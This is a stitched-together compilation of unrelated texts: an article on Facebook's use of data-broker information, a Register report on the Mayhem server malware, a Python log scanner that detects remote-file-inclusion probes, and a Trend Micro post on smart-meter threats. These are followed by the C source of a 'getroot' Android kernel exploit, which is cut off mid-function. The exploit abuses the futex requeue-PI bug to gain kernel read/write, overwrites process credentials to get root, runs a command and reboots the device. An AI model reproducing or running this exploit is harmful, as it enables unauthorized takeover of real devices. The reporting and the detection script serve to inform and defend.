Two of Facebook's partners, Datalogix and Acxiom -- one of the oldest data brokers and a partner of Huffington Post's parent company AOL, Inc., -- were among the nine data brokers the Federal Trade Commission analyzed in a recent in-depth study. The study found that data brokers "collect consumer data from numerous sources, largely without consumers' knowledge" and "store billions of data elements." Acxiom has a database of about 3,000 data segments for nearly every U.S. consumer. Brokers share this information among "multiple layers of data brokers providing data to each other," and then analyze the data to make "potentially sensitive inferences" about the consumer. These sensitive data points could range from health specifics, like high cholesterol, to broader demographic categories -- like the so-called "Urban Scramble," which includes a "high concentration of Latinos and African Americans with low incomes" or the so-called "Rural Everlasting," which includes single men and women over the age of 66 with "low educational attainment and low net worths." Some other examples of data points the FTC noted:
Presence of Elderly Parent
Presence of Children in Household
Birth Dates of Each Child in House
Single Parent with Children
Ethnic and Religious Affiliations
Home Size
Market Value
Date of Move
Gambling - State Lotteries
Affluent Baby Boomer
Type of Credit Cards
Date of Last Travel Purchase
Buying Activity
Working-Class Mom
Buying Channel Preference (e.g., Internet, Mail, Phone)
Average Days Between Orders
Last Online Order Date
Last Offline Order Date
Smoker in Household
Allergy Sufferer
Weight Loss & Supplements
Expectant Parent
The data collection is difficult to skirt. One Time Magazine reporter went to great lengths to hide her pregnancy from big data; she said her husband ended up looking like a criminal when he went to a drugstore and tried to purchase enough Amazon gift cards to buy a stroller on the website.
This kind of ultra-specific marketing also can become eerie. Take the case of Mike Seay, who the LA Times reported received an OfficeMax marketing letter addressed to "Mike Seay, Daughter Killed in Car Crash." OfficeMax said that the information came from a third-party broker, but did not specify which one. Facebook uses all this outside information to target ads to you. This past June, Facebook announced that it would start using data from users' web browsing history to serve targeted advertisements as such: Of course, targeting ads is hardly a new phenomenon; Nielsen started gathering information about radio audiences back in the '30s. But because Facebook has so much information on every user, the kinds of demographics they make available to advertisers are more comprehensive. These are some of the ad target categories that Facebook allows: For example, a company could specify its audience, said Facebook, "to target people who recently moved and are engaged or in a relationship and in the industries of Accounting and Finance." When Facebook introduced its ad targeting, it said, "When we ask people about our ads, one of the top things they tell us is that they want to see ads that are more relevant to their interests." But that explanation doesn't really tell the whole story. While some users may not mind being shown targeted ads to help them pick out a new TV, this example brushes over the full scope of items being marketed to you based on your data. For instance, according to a report from the Center for Digital Democracy, financial service companies have taken to Facebook for "data mining, targeting, and influencing consumers and their networks of friends," and some companies are developing "new leads for their loan and refinance offers" based on users' Facebook behavior. 
And the finance world is not a small amount of Facebook's advertising platform: According to a Business Insider investigation, Visa, American Express, Capital One and Citibank are among the top 35 biggest advertisers on Facebook. When Facebook describes its newly implemented changes, it doesn't seem as eager to discuss the financial plans it might be helping the companies sell you. So who really benefits from these highly targeted ads? For one, Facebook itself. Facebook's ad revenue grew 82 percent from 2013 to the first quarter of 2014, totaling $2.27 billion. Joseph Turow, a professor at the University of Pennsylvania's Annenberg School for Communication, told the New York Times that this new user tracking is making Facebook one of the fastest-growing advertising companies on the Internet. "It's more likely to help Facebook than you," he said. If you're not very keen on helping Facebook generate more profitable ads at the price of your privacy, Facebook suggests you choose the "x" out option on individual ads. This won't change the data being gathered about your interests, but it should help prevent an influx of credit card ads from popping up on your Facebook. If you want your targeted ads to stop completely, Facebook recommends you use the industry-standard opt-out program from Digital Advertising Alliance. However, those two recommendations have been dismissed by privacy advocates like Jeff Chester, executive director of the Center for Digital Democracy, who called them "a political smokescreen to enable Facebook to engage in more data gathering." FTC chairwoman Edith Ramirez has also urged the wider digital advertising community to create a "more persistent method" of opting out that would give consumers more control. According to a Consumer Reports poll, 85 percent of online consumers oppose Internet ad tracking. Facebook has been rolling out location services that effectively turn mobile phones into location tracking devices.
What's next when it comes to information gathering by Facebook? TechCrunch spotlighted Facebook's new tracking feature, "Nearby Friends," which is being pitched as an opt-in way to find out which of your friends is located within a mile of you. While you don't receive the exact location of your friends, Facebook receives your exact location. The feature uses "Location Tracking" to create your "Location History." While you can clear your history and turn off the app at will, Facebook noted that it "may still receive your most recent precise location so that you can, for example, post content that's tagged with your location or find nearby places." So some amount of tracking is happening, no matter what. And it plans to use this location data to sell you things. Back when Facebook unveiled "Nearby Friends" in April, a company spokesman conceded to TechCrunch that "at this time [Nearby Friends] is not being used for advertising or marketing, but in the future it will be." It wouldn't be surprising if Facebook did, indeed, begin selling location-based data to marketers. After all, studies confirm that this advertising is very successful at convincing you to buy things. A recent U.K. study conducted by media strategy company Vizeum and direct marketing agency iProspect found that location-based advertising created an "11 percent increase in store visits among more than 172,000 people that were served adverts." This technology is only going to become more sophisticated with the rise of more location-tracking apps that can follow your movements in-store. And, yes, Facebook can use you and your data for research. They say so right... Yeah... right there. Despite that "research clause," you may have been surprised to learn that Facebook experimented on nearly 700,000 Facebook users for one week in the summer of 2012.
The site manipulated their News Feeds to prioritize positive or negative content, attempting to determine if emotions spread contagiously through social networks. There was no age restriction on the data, meaning it may have involved users under 18. Cornell researchers then analyzed Facebook's data. The resulting study, published in the Proceedings of the National Academy of Sciences, found that emotional states can be transferred via social networks. Company executive Sheryl Sandberg has since apologized for the study, calling it "poorly communicated." Andrew Ledvina, a former data scientist at Facebook from early 2012 to the summer of 2013, told the Wall Street Journal that Facebook did not have an internal review board monitoring research studies conducted by the data science team. He said that the team had freedom to try nearly any test it desired, so long as it didn't interfere with the user experience. He added that the sheer mass of the experiment's subjects was at times difficult to really comprehend, numbering in the hundreds of thousands of users. As he put it, "You get a little desensitized to it." Forbes points out that the "research" part of the User Data policy was not added until May 2012, while the research was conducted in January of 2012. Facebook data is potentially available to government agencies. Facebook has spoken out about U.S. government information requests it considers unconstitutional. Facebook's Deputy General Counsel Chris Sonderby published a statement last month about the site's legal fight regarding one such search warrant, in which the government requested nearly all data on 381 Facebook users. Only 62 of those searched were charged, in a disability fraud case. He noted that, "We regularly push back on requests that are vague or overly broad." But Facebook's second Global Government Requests Report showed that when the U.S. 
government asks, Facebook hands over at least some user data in more than 80 percent of cases: And if you actually think you know what you've agreed to, remember that Facebook maintains the right to change its mind about user conditions at any time. Basically, if you're still using Facebook, you're agreeing. After the site unveiled its new, more aggressive approach to targeted advertising in June, a Facebook spokesman told the Wall Street Journal, "We routinely discuss product and policy updates with our regulators -- the FTC and the Irish DPC -- and this time is no different. While we are not required to notify nor seek approval from regulators before we make changes, we do keep them informed and answer any questions they may have." It's clear that the meaning of privacy is changing drastically in the digital age. While Facebook may be one of the agents of change in drafting a new definition, it's certainly not the only one. As standards of privacy continue to morph, knowledge remains your best weapon in protecting yourself and your information. We recommend checking out the documentary "Terms And Conditions May Apply" for an in-depth look at privacy in the digital age. Common Sense Media also offers helpful guidelines for protecting your and your children's privacy online. Source: Didn't Read Facebook's Fine Print? Here's Exactly What It Says
-
Manic malware Mayhem spreads through Linux, FreeBSD web servers And how Google could cripple infection rate in a second By Iain Thomson, 18 Jul 2014 Malware dubbed Mayhem is spreading through Linux and FreeBSD web servers, researchers say. The software nasty uses a grab bag of plugins to cause mischief, and infects systems that are not up to date with security patches. Andrej Kovalev, Konstantin Otrashkevich and Evgeny Sidorov, who work at Russian internet portal Yandex, discovered the malware targeting *nix servers. They traced transmissions from compromised computers to two command and control (C&C) servers. So far they have found 1,400 machines that have fallen to the code, with potentially thousands more to come. "In the *nix world, autoupdate technologies aren't widely used, especially in comparison with desktops and smartphones. The vast majority of web masters and system administrators have to update their software manually and test that their infrastructure works correctly," the trio wrote in a technical report for Virus Bulletin. "For ordinary websites, serious maintenance is quite expensive and often webmasters don't have an opportunity to do it. This means it is easy for hackers to find vulnerable web servers and to use such servers in their botnets." Mayhem spreads by finding servers hosting websites with a remote file inclusion (RFI) vulnerability – it even uses Google's /humans.txt to test for this. If the ad giant rewrote this file, specifically changing the words "we can shake", Mayhem infections would be slowed – until its rfiscan.so plugin is updated. Once the malware exploits an RFI, or some other weakness, to run a PHP script on a victim, it drops a shared object called libworker.so onto the infected system and pings its C&C servers. It then creates a hidden file system, usually called sd0, and downloads eight plugins, none of which were picked up by the VirusTotal malware scanning tool.
These include a couple of brute-force password crackers targeting FTP, Wordpress and Joomla accounts – presumably to spread the malware further – and information-gathering web crawlers, one of which hunts for other sites with RFI holes. Some of the vulnerable web applications Mayhem scans for (Credit: Kovalev, Otrashkevich, Sidorov) The Yandex trio warn there may be other plugins in circulation, based on data found on the two cracked C&C servers. These include a tool specifically to exploit systems that haven't patched the Heartbleed vulnerability in OpenSSL. The team notes that the Mayhem code does bear several similarities to the Trololo_mod and Effusion families of malware, which target Apache and Nginx servers respectively. They recommend system administrators check their servers to make sure Mayhem's spread is limited. ® Source: Manic malware Mayhem spreads through Linux, FreeBSD web servers • The Register
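One way an administrator can look for the RFI probe the article describes in ordinary web-server access logs, as an added example that is not code from The Register or from the Yandex researchers: it parses Apache combined-format lines (the sample lines, addresses and the log regex are constructed assumptions) and flags requests whose query parameters carry a remote URL, scoring the /humans.txt probe separately from other remote-include attempts.

```python
"""Flag remote-file-inclusion (RFI) probes in Apache combined access logs.

Added example. Mayhem's rfiscan.so plugin tests a site for RFI by asking it
to include a remote URL (the article names Google's /humans.txt). In the
access log that shows up as a query-string parameter whose value is itself
an absolute URL, which is what this scanner looks for.
"""
import re
from typing import Iterable, Iterator, Optional, Tuple
from urllib.parse import parse_qsl, urlparse

# Apache "combined" format: ip ident user [ts] "METHOD target PROTO" status size ...
# (constructed regex; it matches the constructed sample lines below)
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Schemes PHP's include()/require() will fetch when allow_url_include is on.
REMOTE_SCHEMES = ("http", "https", "ftp")


def classify_request(target: str) -> Optional[str]:
    """Return None, "rfi-probe" or "rfi-humans-txt" for one request target.

    parse_qsl percent-decodes parameter values, so an encoded URL such as
    http%3A%2F%2F... is inspected the same way as a plain one.
    """
    parsed = urlparse(target)
    for _name, value in parse_qsl(parsed.query, keep_blank_values=True):
        candidate = urlparse(value.strip())
        if candidate.scheme.lower() in REMOTE_SCHEMES and candidate.netloc:
            # Any remote URL in a parameter is worth a look; the specific
            # public file the article mentions gets its own verdict.
            if candidate.path.lower().endswith("/humans.txt"):
                return "rfi-humans-txt"
            return "rfi-probe"
    return None


def scan_log(lines: Iterable[str]) -> Iterator[Tuple[str, str, str]]:
    """Yield (client_ip, request_target, verdict) for each suspicious line."""
    for line in lines:
        match = LOG_RE.match(line)
        if not match:
            continue  # not in the expected format; skip rather than guess
        verdict = classify_request(match.group("target"))
        if verdict is not None:
            yield match.group("ip"), match.group("target"), verdict


# Constructed sample log lines (documentation addresses, not real hosts).
SAMPLE_LOG = [
    '203.0.113.7 - - [18/Jul/2014:10:01:02 +0000] "GET /index.php?page='
    'http://www.google.com/humans.txt HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [18/Jul/2014:10:01:03 +0000] "GET /index.php?page='
    'http%3A%2F%2F198.51.100.9%2Finclude.txt%3F HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.20 - - [18/Jul/2014:10:02:10 +0000] "GET /index.php?page=about '
    'HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '198.51.100.21 - - [18/Jul/2014:10:02:11 +0000] "POST /wp-login.php '
    'HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]


def scan_sample() -> list:
    """Run the scanner over the constructed sample; two hits are expected."""
    return list(scan_log(SAMPLE_LOG))


if __name__ == "__main__":
    for ip, target, verdict in scan_sample():
        print(f"{verdict:15} {ip:15} {target}")
```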
-
Smart Meter Attack Scenarios 12:51 am (UTC-7) | by Rainer Link (Senior Threat Researcher) In our previous post, we looked at how smart meters were being introduced across multiple countries and regions, and why these devices pose security risks to their users. At their heart, a smart meter is simply… a computer. Let’s look at our existing computers – whether they are PCs, smartphones, tablets, or embedded devices. Similarly, these smart meters are communicating via understood technologies: cellular connectivity, power-line networking, or the user’s own Internet connection. With that in mind, we have to consider the possible threats – what could happen if a smart meter is compromised? Similarly, what are the problems that could result if the connectivity of a smart meter is disrupted? Let us see. Perhaps the most obvious risk is simple: meter tampering. If a smart meter can be hacked, inaccurate information can be sent back to the utility, allowing an attacker to adjust the reading and resulting in an inflated bill. Let’s say, for example, that you have an argument with your neighbor. In revenge, if he can access your smart meter, you might see a rather large electric bill. Of course, the bill can also change in the opposite direction. Let’s say you’re engaged in certain activities that require high levels of electricity… altcoin mining, for example. The biggest running cost for such an operation would be the electric bill. The smart meter could be hacked to have a lower reading – or, perhaps, in a location with time-varying electric rates, to make it look like the electricity was used at off-peak times? What are some other threats at the local, “retail” level when it comes to smart meters? Crime gangs (with smarts) may well find uses for smart meters too. Power savings are frequently promoted as a benefit of smart meters. However, power consumption is also a good way of checking if someone is in a home or not.
Let’s say that a vulnerability made it easy for somebody other than the homeowner or the utility to see what the power usage was. (It could be as easy as a poorly-designed API, mobile app, or website.) The smart meter would then essentially become a giant “please rob me” sign for properly equipped thieves. Alternately, if that smart meter can be controlled remotely, you now have an excellent way to carry out extortion. Such a nice house you have there, it’d be a shame if anything bad happened to its power… The connectivity of the smart meters can also be a security risk. Some meters use the cellular network to provide the connection to the main servers of their utility. The utility would, of course, be paying for the bills of these meters. A truly determined person could abuse this “free” phone to make calls, send text messages, even connect to the Internet. Alternately, the smart meter may use the same Internet connection as the home. This represents a potential risk: if somebody was able to hack the smart meter from the outside, then that attacker would have access to the house’s internal network. This would put your own internal network at risk of attack; it would be as dangerous as letting anyone connect to your home network. None of the above attacks are inevitable. You can build defenses against all of them. However, it is inevitable that somewhere, somehow, the defenses will fail. These attacks are possible, and we will have to figure out how to defend against them, especially once smart meters become more prevalent. All of the attacks I discussed above are essentially small-scale, however. What happens when you look at the security of not just individual meters, but the smart grid as a whole? That’s what we will discuss in the third post in this three-part series on smart meters and smart grids. Source: Smart Meter Attack Scenarios | Security Intelligence Blog | Trend Micro
-
/* getroot 2014/07/12 */
/*
 * Copyright © 2014 CUBE
 *
 * This program is free software: you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program.  If not, see <http://www.gnu.org/licenses/>.
 *
 */

/* Written against Android's bionic libc on 32-bit ARM (note the
 * /system/bin paths, the 0xc0000000 kernel/user split and the hand-rolled
 * struct mmsghdr, which bionic lacked at the time). */
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <netinet/tcp.h>    /* SOL_TCP */
#include <pthread.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <linux/futex.h>
#include <sys/resource.h>
#include <string.h>
#include <fcntl.h>
#include <errno.h>          /* errno in the FAILED READ/WRITE messages */
#include <unistd.h>         /* pipe, read, write, close, fork, sleep */
#include <signal.h>         /* sigaction, kill */

#define FUTEX_WAIT_REQUEUE_PI 11
#define FUTEX_CMP_REQUEUE_PI 12

/* sendmmsg() message vector entry; only used through the raw syscall. */
struct mmsghdr {
    struct msghdr msg_hdr;
    unsigned int msg_len;
};

//rodata
/* 4-byte patterns written into the kernel: -1 (new addr_limit) and 1 (new uid). */
const char str_ffffffff[] = {0xff, 0xff, 0xff, 0xff, 0};
const char str_1[] = {1, 0, 0, 0, 0};

//bss
int _swag = 0;                      /* futex words for the requeue dance */
int _swag2 = 0;
unsigned long HACKS_final_stack_base = 0; /* thread_info of the target thread */
pid_t waiter_thread_tid;
pthread_mutex_t done_lock = PTHREAD_MUTEX_INITIALIZER;
pthread_cond_t done = PTHREAD_COND_INITIALIZER;
pthread_mutex_t is_thread_desched_lock = PTHREAD_MUTEX_INITIALIZER;
pthread_cond_t is_thread_desched = PTHREAD_COND_INITIALIZER;
int do_socket_tid_read = 0;
int did_socket_tid_read = 0;
int do_splice_tid_read = 0;
int did_splice_tid_read = 0;
int do_dm_tid_read = 0;
int did_dm_tid_read = 0;
pthread_mutex_t is_thread_awake_lock = PTHREAD_MUTEX_INITIALIZER;
pthread_cond_t is_thread_awake = PTHREAD_COND_INITIALIZER;
int HACKS_fdm = 0;                  /* master side of the pty used as a trigger */
unsigned long MAGIC = 0;            /* userland buffer posing as a kernel rt_mutex waiter */
unsigned long MAGIC_ALT = 0;
pthread_mutex_t *is_kernel_writing;
pid_t last_tid = 0;
int g_argc;
char rootcmd[256];

/* Copy count bytes from writebuf into readbuf by bouncing them through a
 * pipe. Once addr_limit has been raised, writebuf may be a kernel address,
 * so this is the exploit's arbitrary-read primitive. */
ssize_t read_pipe(void *writebuf, void *readbuf, size_t count)
{
    int pipefd[2];
    ssize_t len;

    pipe(pipefd);
    len = write(pipefd[1], writebuf, count);
    if (len != count) {
        printf("FAILED READ @ %p : %d %d\n", writebuf, (int)len, errno);
        while (1) {
            sleep(10);
        }
    }
    read(pipefd[0], readbuf, count);
    close(pipefd[0]);
    close(pipefd[1]);
    return len;
}

/* Same trick in the other direction: the arbitrary-write primitive. */
ssize_t write_pipe(void *readbuf, void *writebuf, size_t count)
{
    int pipefd[2];
    ssize_t len;

    pipe(pipefd);
    write(pipefd[1], writebuf, count);
    len = read(pipefd[0], readbuf, count);
    if (len != count) {
        printf("FAILED WRITE @ %p : %d %d\n", readbuf, (int)len, errno);
        while (1) {
            sleep(10);
        }
    }
    close(pipefd[0]);
    close(pipefd[1]);
    return len;
}

/* Signal handler (signal 12) run on a helper thread. First invocation
 * raises that thread's addr_limit; later invocation walks the kernel
 * stack to find the thread's cred structure and overwrites the ids. */
void write_kernel(int signum)
{
    char *slavename;
    int pipefd[2];
    char readbuf[0x100];
    unsigned long stackbuf[4];
    unsigned long buf_a[0x100];
    unsigned long val1;
    unsigned long buf_b[0x40];
    unsigned long val2;
    unsigned long buf_c[6];
    pid_t pid;
    int i;
    int ret;

    pthread_mutex_lock(&is_thread_awake_lock);
    pthread_cond_signal(&is_thread_awake);
    pthread_mutex_unlock(&is_thread_awake_lock);

    if (HACKS_final_stack_base == 0) {
        printf("cpid1 resumed.\n");
        pthread_mutex_lock(is_kernel_writing);
        HACKS_fdm = open("/dev/ptmx", O_RDWR);
        unlockpt(HACKS_fdm);
        slavename = ptsname(HACKS_fdm);
        open(slavename, O_RDWR);
        do_splice_tid_read = 1;
        while (1) {
            if (did_splice_tid_read != 0) {
                break;
            }
        }
        read(HACKS_fdm, readbuf, 0x100);
        write_pipe((void *)(HACKS_final_stack_base + 8), (void *)str_ffffffff, 4);
        pthread_mutex_unlock(is_kernel_writing);
        while (1) {
            sleep(10);
        }
    }

    printf("cpid3 resumed.\n");
    pthread_mutex_lock(is_kernel_writing);
    printf("hack.\n");
    read_pipe((void *)HACKS_final_stack_base, stackbuf, 0x10);
    read_pipe((void *)(stackbuf[3]), buf_a, 0x400);
    val1 = 0;
    val2 = 0;
    pid = 0;
    /* Look for four consecutive pairs of equal kernel pointers (the
     * list heads at the start of task_struct) to locate the cred pointer. */
    for (i = 0; i < 0x100; i++) {
        if (buf_a[i] == buf_a[i + 1]) {
            if (buf_a[i] > 0xc0000000) {
                if (buf_a[i + 2] == buf_a[i + 3]) {
                    if (buf_a[i + 2] > 0xc0000000) {
                        if (buf_a[i + 4] == buf_a[i + 5]) {
                            if (buf_a[i + 4] > 0xc0000000) {
                                if (buf_a[i + 6] == buf_a[i + 7]) {
                                    if (buf_a[i + 6] > 0xc0000000) {
                                        val1 = buf_a[i + 7];
                                        break;
                                    }
                                }
                            }
                        }
                    }
                }
            }
        }
    }
    read_pipe((void *)val1, buf_b, 0x100);
    val2 = buf_b[0x16];
    if (val2 > 0xc0000000) {
        if (val2 < 0xffff0000) {
            read_pipe((void *)val2, buf_c, 0x18);
            if (buf_c[0] != 0) {
                if (buf_c[1] != 0) {
                    if (buf_c[2] == 0) {
                        if (buf_c[3] == 0) {
                            if (buf_c[4] == 0) {
                                if (buf_c[5] == 0) {
                                    buf_c[0] = 1;
                                    buf_c[1] = 1;
                                    write_pipe((void *)val2, buf_c, 0x18);
                                }
                            }
                        }
                    }
                }
            }
        }
    }
    /* Zero the uid/gid fields and set all capability masks to -1. */
    buf_b[1] = 0;
    buf_b[2] = 0;
    buf_b[3] = 0;
    buf_b[4] = 0;
    buf_b[5] = 0;
    buf_b[6] = 0;
    buf_b[7] = 0;
    buf_b[8] = 0;
    buf_b[10] = 0xffffffff;
    buf_b[11] = 0xffffffff;
    buf_b[12] = 0xffffffff;
    buf_b[13] = 0xffffffff;
    buf_b[14] = 0xffffffff;
    buf_b[15] = 0xffffffff;
    buf_b[16] = 0xffffffff;
    buf_b[17] = 0xffffffff;
    write_pipe((void *)val1, buf_b, 0x48);
    pid = syscall(__NR_gettid);
    i = 0;
    while (1) {
        if (buf_a[i] == pid) {
            write_pipe((void *)(stackbuf[3] + (i << 2)), (void *)str_1, 4);
            if (getuid() != 0) {
                printf("root failed.\n");
                while (1) {
                    sleep(10);
                }
            } else {
                break;
            }
        }
        i++;
    }

    //rooted
    sleep(1);
    if (g_argc >= 2) {
        system(rootcmd);
    }
    system("/system/bin/touch /dev/rooted");
    pid = fork();
    if (pid == 0) {
        while (1) {
            ret = access("/dev/rooted", F_OK);
            if (ret >= 0) {
                break;
            }
        }
        printf("wait 10 seconds...\n");
        sleep(10);
        printf("rebooting...\n");
        sleep(1);
        system("reboot");
        while (1) {
            sleep(10);
        }
    }
    pthread_mutex_lock(&done_lock);
    pthread_cond_signal(&done);
    pthread_mutex_unlock(&done_lock);
    while (1) {
        sleep(10);
    }
    return;
}

/* Helper thread body: installs write_kernel as the signal-12 handler,
 * takes the requested nice value and then blocks in FUTEX_LOCK_PI. */
void *make_action(void *arg)
{
    int prio;
    struct sigaction act;
    int ret;

    prio = (int)(long)arg;
    last_tid = syscall(__NR_gettid);
    pthread_mutex_lock(&is_thread_desched_lock);
    pthread_cond_signal(&is_thread_desched);
    act.sa_handler = write_kernel;
    sigemptyset(&act.sa_mask);
    act.sa_flags = 0;
    act.sa_restorer = NULL;
    sigaction(12, &act, NULL);
    setpriority(PRIO_PROCESS, 0, prio);
    pthread_mutex_unlock(&is_thread_desched_lock);
    do_dm_tid_read = 1;
    while (1) {
        if (did_dm_tid_read != 0) {
            break;
        }
    }
    ret = syscall(__NR_futex, &_swag2, FUTEX_LOCK_PI, 1, 0, NULL, 0);
    printf("futex dm: %d\n", ret);
    while (1) {
        sleep(10);
    }
    return NULL;
}

/* Read voluntary_ctxt_switches from /proc/self/task/<tid>/status;
 * -1 if the file cannot be opened. */
static int read_vcs(pid_t tid)
{
    char filename[256];
    char filebuf[0x1000];
    FILE *fp;
    char *pdest;
    int cnt;

    sprintf(filename, "/proc/self/task/%d/status", tid);
    fp = fopen(filename, "rb");
    if (fp == 0) {
        return -1;
    }
    memset(filebuf, 0, sizeof(filebuf));
    fread(filebuf, 1, sizeof(filebuf) - 1, fp);
    fclose(fp);
    pdest = strstr(filebuf, "voluntary_ctxt_switches");
    if (pdest == NULL) {
        return -1;
    }
    pdest += 0x19;   /* skip "voluntary_ctxt_switches:\t" */
    cnt = atoi(pdest);
    return cnt;
}

/* Start a helper thread with the given priority and wait until it has
 * voluntarily deschedulded exactly once (i.e. is blocked in the futex). */
pid_t wake_actionthread(int prio)
{
    pthread_t th4;
    pid_t pid;
    int vcscnt, vcscnt2;

    do_dm_tid_read = 0;
    did_dm_tid_read = 0;
    pthread_mutex_lock(&is_thread_desched_lock);
    pthread_create(&th4, 0, make_action, (void *)(long)prio);
    pthread_cond_wait(&is_thread_desched, &is_thread_desched_lock);
    pid = last_tid;
    vcscnt = read_vcs(pid);
    while (1) {
        if (do_dm_tid_read != 0) {
            break;
        }
        usleep(10);
    }
    did_dm_tid_read = 1;
    while (1) {
        vcscnt2 = read_vcs(pid);
        if (vcscnt2 == vcscnt + 1) {
            break;
        }
        usleep(10);
    }
    pthread_mutex_unlock(&is_thread_desched_lock);
    return pid;
}

/* Connect to the local listener on port 5551 with a 1-byte send buffer so
 * that sendmmsg() blocks. */
int make_socket(void)
{
    int sockfd;
    struct sockaddr_in addr = {0};
    int ret;
    int sock_buf_size;

    sockfd = socket(AF_INET, SOCK_STREAM, SOL_TCP);
    if (sockfd < 0) {
        printf("socket failed.\n");
        usleep(10);
    } else {
        addr.sin_family = AF_INET;
        addr.sin_port = htons(5551);
        addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
    }
    while (1) {
        ret = connect(sockfd, (struct sockaddr *)&addr, 16);
        if (ret >= 0) {
            break;
        }
        usleep(10);
    }
    sock_buf_size = 1;
    setsockopt(sockfd, SOL_SOCKET, SO_SNDBUF, (char *)&sock_buf_size, sizeof(sock_buf_size));
    return sockfd;
}

/* Waiter thread: blocks in FUTEX_WAIT_REQUEUE_PI, then spins in
 * sendmmsg() so its kernel stack keeps being overwritten with MAGIC. */
void *send_magicmsg(void *arg)
{
    int sockfd;
    struct mmsghdr msgvec[1];
    struct iovec msg_iov[8];
    unsigned long databuf[0x20];
    int i;
    int ret;

    waiter_thread_tid = syscall(__NR_gettid);
    setpriority(PRIO_PROCESS, 0, 12);
    sockfd = make_socket();
    for (i = 0; i < 0x20; i++) {
        databuf[i] = MAGIC;
    }
    for (i = 0; i < 8; i++) {
        msg_iov[i].iov_base = (void *)MAGIC;
        msg_iov[i].iov_len = 0x10;
    }
    msgvec[0].msg_hdr.msg_name = databuf;
    msgvec[0].msg_hdr.msg_namelen = 0x80;
    msgvec[0].msg_hdr.msg_iov = msg_iov;
    msgvec[0].msg_hdr.msg_iovlen = 8;
    msgvec[0].msg_hdr.msg_control = databuf;
    msgvec[0].msg_hdr.msg_controllen = 0x20;
    msgvec[0].msg_hdr.msg_flags = 0;
    msgvec[0].msg_len = 0;
    syscall(__NR_futex, &_swag, FUTEX_WAIT_REQUEUE_PI, 0, 0, &_swag2, 0);
    do_socket_tid_read = 1;
    while (1) {
        if (did_socket_tid_read != 0) {
            break;
        }
    }
    ret = 0;
    while (1) {
        ret = syscall(__NR_sendmmsg, sockfd, msgvec, 1, 0);
        if (ret <= 0) {
            break;
        }
    }
    if (ret < 0) {
        perror("SOCKSHIT");
    }
    printf("EXIT WTF\n");
    while (1) {
        sleep(10);
    }
    return NULL;
}

/* Lay out a fake rt_mutex_waiter at base (list nodes pointing at itself). */
static void set_magic_node(unsigned long base)
{
    *((unsigned long *)(base - 4)) = 0x81;
    *((unsigned long *)base) = base + 0x20;
    *((unsigned long *)(base + 8)) = base + 0x28;
    *((unsigned long *)(base + 0x1c)) = 0x85;
    *((unsigned long *)(base + 0x24)) = base;
    *((unsigned long *)(base + 0x2c)) = base + 8;
}

/* Main exploit thread: triggers the requeue-PI bug, then uses helper
 * threads of different priorities to leak kernel stack addresses. */
void *search_goodnum(void *arg)
{
    int ret;
    int vcscnt, vcscnt2;
    unsigned long magicval;
    pid_t pid;
    unsigned long goodval, goodval2;
    int i;
    char buf[0x1000];

    syscall(__NR_futex, &_swag2, FUTEX_LOCK_PI, 1, 0, NULL, 0);
    while (1) {
        ret = syscall(__NR_futex, &_swag, FUTEX_CMP_REQUEUE_PI, 1, 0, &_swag2, _swag);
        if (ret == 1) {
            break;
        }
        usleep(10);
    }
    wake_actionthread(6);
    wake_actionthread(7);
    _swag2 = 0;
    do_socket_tid_read = 0;
    did_socket_tid_read = 0;
    syscall(__NR_futex, &_swag2, FUTEX_CMP_REQUEUE_PI, 1, 0, &_swag2, _swag2);
    while (1) {
        if (do_socket_tid_read != 0) {
            break;
        }
    }
    vcscnt = read_vcs(waiter_thread_tid);
    did_socket_tid_read = 1;
    while (1) {
        vcscnt2 = read_vcs(waiter_thread_tid);
        if (vcscnt2 == vcscnt + 1) {
            break;
        }
        usleep(10);
    }

    printf("starting the dangerous things.\n");
    set_magic_node(MAGIC_ALT);
    set_magic_node(MAGIC);
    magicval = *((unsigned long *)MAGIC);
    wake_actionthread(11);
    if (*((unsigned long *)MAGIC) == magicval) {
        printf("using MAGIC_ALT.\n");
        MAGIC = MAGIC_ALT;
    }

    while (1) {
        is_kernel_writing = (pthread_mutex_t *)malloc(sizeof(pthread_mutex_t));
        pthread_mutex_init(is_kernel_writing, NULL);
        set_magic_node(MAGIC);
        pid = wake_actionthread(11);
        goodval = *((unsigned long *)MAGIC) & 0xffffe000;
        printf("%p is a good number.\n", (void *)goodval);
        do_splice_tid_read = 0;
        did_splice_tid_read = 0;
        pthread_mutex_lock(&is_thread_awake_lock);
        kill(pid, 12);
        pthread_cond_wait(&is_thread_awake, &is_thread_awake_lock);
        pthread_mutex_unlock(&is_thread_awake_lock);
        while (1) {
            if (do_splice_tid_read != 0) {
                break;
            }
            usleep(10);
        }
        vcscnt = read_vcs(pid);
        did_splice_tid_read = 1;
        while (1) {
            vcscnt2 = read_vcs(pid);
            if (vcscnt2 != vcscnt + 1) {
                break;
            }
            usleep(10);
        }

        goodval2 = 0;
        set_magic_node(MAGIC);
        *((unsigned long *)(MAGIC + 0x24)) = goodval + 8;
        wake_actionthread(12);
        goodval2 = *((unsigned long *)(MAGIC + 0x24));
        printf("%p is also a good number.\n", (void *)goodval2);

        for (i = 0; i < 9; i++) {
            set_magic_node(MAGIC);
            pid = wake_actionthread(10);
            if (*((unsigned long *)MAGIC) < goodval2) {
                HACKS_final_stack_base = *((unsigned long *)MAGIC) & 0xffffe000;
                pthread_mutex_lock(&is_thread_awake_lock);
                kill(pid, 12);
                pthread_cond_wait(&is_thread_awake, &is_thread_awake_lock);
                pthread_mutex_unlock(&is_thread_awake_lock);
                write(HACKS_fdm, buf, 0x1000);
                while (1) {
                    sleep(10);
                }
